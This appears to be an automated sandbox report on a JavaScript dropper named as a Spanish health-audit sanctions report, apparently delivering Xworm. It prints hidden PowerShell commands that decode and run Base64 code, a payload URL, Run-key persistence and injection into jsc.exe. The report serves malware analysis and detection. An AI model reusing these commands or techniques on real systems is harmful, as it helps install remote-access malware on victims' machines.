Analysis
-
max time kernel
103s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20250610-en
resource tags
arch:x64, arch:x86, image:win10v2004-20250610-en, locale:en-us, os:windows10-2004-x64, system
submitted
02/07/2025, 18:52
Static task
static1
Behavioral task
behavioral1
Sample
NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
Resource
win10v2004-20250610-en
General
-
Target
NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
-
Size
19KB
-
MD5
9f6c707c6678a8c0bf0d1fe1412b26a6
-
SHA1
3c6425c1a5dbfe0a425ee46cc1a4b9a4f8fb8ed1
-
SHA256
0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1
-
SHA512
c8c469d76efbde71a296f7c59537b58475a6359e823ac6800e5bc0c1b1f6f442b665fd4d0401f55da8cc8426002d686ed7af6046a22ae38f6bbec173c3127b29
-
SSDEEP
192:QTV70IM2f2BWAK/Mbk2B6BnLWlxj4eO05VG8IUZYDanl:0V1M2+M+bdYNc7v1IUyDo
Malware Config
Extracted
https://archive.org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg
Signatures
-
Detect Xworm Payload 1 IoCs
resource: behavioral1/memory/4000-20-0x0000000000400000-0x000000000040E000-memory.dmp
yara_rule: family_xworm
Xworm family
-
Blocklisted process makes network request 6 IoCs
flow 3: pid 2948 wscript.exe
flow 8: pid 1328 powershell.exe
flow 37: pid 1328 powershell.exe
flow 38: pid 4388 WScript.exe
flow 43: pid 2220 powershell.exe
flow 61: pid 2220 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid 1328 powershell.exe
pid 2220 powershell.exe
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Key value queried: \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation (cmd.exe)
Key value queried: \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation (WScript.exe)
Key value queried: \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation (wscript.exe)
Adds Run key to start application 2 TTPs 2 IoCs
Set value (str): \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" (powershell.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" (powershell.exe)
Suspicious use of SetThreadContext 2 IoCs
PID 1328 set thread context of 4000: pid 1328 powershell.exe, procid_target 105
PID 2220 set thread context of 1452: pid 2220 powershell.exe, procid_target 116
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (jsc.exe)
Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (jsc.exe)
Modifies registry class 1 IoCs
Key created: \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000_Classes\Local Settings (cmd.exe)
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid 1328 powershell.exe
pid 1328 powershell.exe
pid 1328 powershell.exe
pid 1328 powershell.exe
pid 1328 powershell.exe
pid 2220 powershell.exe
pid 2220 powershell.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
Token: SeDebugPrivilege, pid 1328 powershell.exe
Token: SeDebugPrivilege, pid 2220 powershell.exe
Token: SeDebugPrivilege, pid 4000 jsc.exe
Token: SeDebugPrivilege, pid 1452 jsc.exe
Suspicious use of WriteProcessMemory 27 IoCs
PID 2948 wrote to memory of 1328: pid 2948 wscript.exe, procid_target 89
PID 2948 wrote to memory of 1328: pid 2948 wscript.exe, procid_target 89
PID 1328 wrote to memory of 5380: pid 1328 powershell.exe, procid_target 99
PID 1328 wrote to memory of 5380: pid 1328 powershell.exe, procid_target 99
PID 924 wrote to memory of 4388: pid 924 cmd.exe, procid_target 103
PID 924 wrote to memory of 4388: pid 924 cmd.exe, procid_target 103
PID 1328 wrote to memory of 3852: pid 1328 powershell.exe, procid_target 104
PID 1328 wrote to memory of 3852: pid 1328 powershell.exe, procid_target 104
PID 1328 wrote to memory of 3852: pid 1328 powershell.exe, procid_target 104
PID 1328 wrote to memory of 4000: pid 1328 powershell.exe, procid_target 105
PID 1328 wrote to memory of 4000: pid 1328 powershell.exe, procid_target 105
PID 1328 wrote to memory of 4000: pid 1328 powershell.exe, procid_target 105
PID 1328 wrote to memory of 4000: pid 1328 powershell.exe, procid_target 105
PID 1328 wrote to memory of 4000: pid 1328 powershell.exe, procid_target 105
PID 1328 wrote to memory of 4000: pid 1328 powershell.exe, procid_target 105
PID 1328 wrote to memory of 4000: pid 1328 powershell.exe, procid_target 105
PID 1328 wrote to memory of 4000: pid 1328 powershell.exe, procid_target 105
PID 4388 wrote to memory of 2220: pid 4388 WScript.exe, procid_target 106
PID 4388 wrote to memory of 2220: pid 4388 WScript.exe, procid_target 106
PID 2220 wrote to memory of 1452: pid 2220 powershell.exe, procid_target 116
PID 2220 wrote to memory of 1452: pid 2220 powershell.exe, procid_target 116
PID 2220 wrote to memory of 1452: pid 2220 powershell.exe, procid_target 116
PID 2220 wrote to memory of 1452: pid 2220 powershell.exe, procid_target 116
PID 2220 wrote to memory of 1452: pid 2220 powershell.exe, procid_target 116
PID 2220 wrote to memory of 1452: pid 2220 powershell.exe, procid_target 116
PID 2220 wrote to memory of 1452: pid 2220 powershell.exe, procid_target 116
PID 2220 wrote to memory of 1452: pid 2220 powershell.exe, procid_target 116
Processes
-
wscript.exe (PID 2948)
  Path: C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  powershell.exe (PID 1328)
    Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='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';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    cmd.exe (PID 5380)
      Path: C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\agnosticism.js"
    jsc.exe (PID 3852)
      Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
    jsc.exe (PID 4000)
      Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken

cmd.exe (PID 924)
  Path: C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\agnosticism.js
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  WScript.exe (PID 4388)
    Path: C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\agnosticism.js"
    - Blocklisted process makes network request
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    powershell.exe (PID 2220)
      Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='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';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Adds Run key to start application
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      jsc.exe (PID 1452)
        Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v16
Downloads
-
Filesize
3KB
MD5
4603c253796ff07ae786a16894b49206
SHA1
4c15e20377d861717b0668c1571ca6ad2f773fe6
SHA256
e2d57c03c72f56be9c7ed107864003befae22a7498ee40bd21ed4e63481c4afe
SHA512
cc9d0aa73b231bc9979b0c1f38a09e549d927caf5bbfe8fd088feabbdd651d0beb301ef1825e027437bdae45eddc26ae03b5bba2e25976051526b47e657f19f7
-
Filesize
1KB
MD5
81fba9af5c9fbee260bee735e50ffb93
SHA1
10648671e56e56b52e0ca50063f0493949e595fb
SHA256
c8e4c56c301eb93c1f3eca54652687455776b2262f5d74b78326c6829b0b16fa
SHA512
7c973376c1006b4ec7747b65f66017927ddf49bf4dcbed440f82f4511e72a344f6a4d980d41e2a2d19ca5c2ad11952644fa4dfbe98902240a449befa0c0dd710
-
Filesize
60B
MD5
d17fe0a3f47be24a6453e9ef58c94641
SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
19KB
MD5
9b49b1a2e0327767db6dc4883654dd22
SHA1
486be1d6c5d4f2f6d7b80613aeae32ed3a7a69ba
SHA256
761b67f0715d7f89c50cdb2dd4a18a49952a21d301907bafbaf0942179afdb30
SHA512
b473926aa77d0827eefeafc7ee8a59989e936ef3c0b7b316b0ab5eb7a34a993c2734419c7a80c8505904dcdb31c672156f33fe6e26084b3d8e8c1b565f6bc206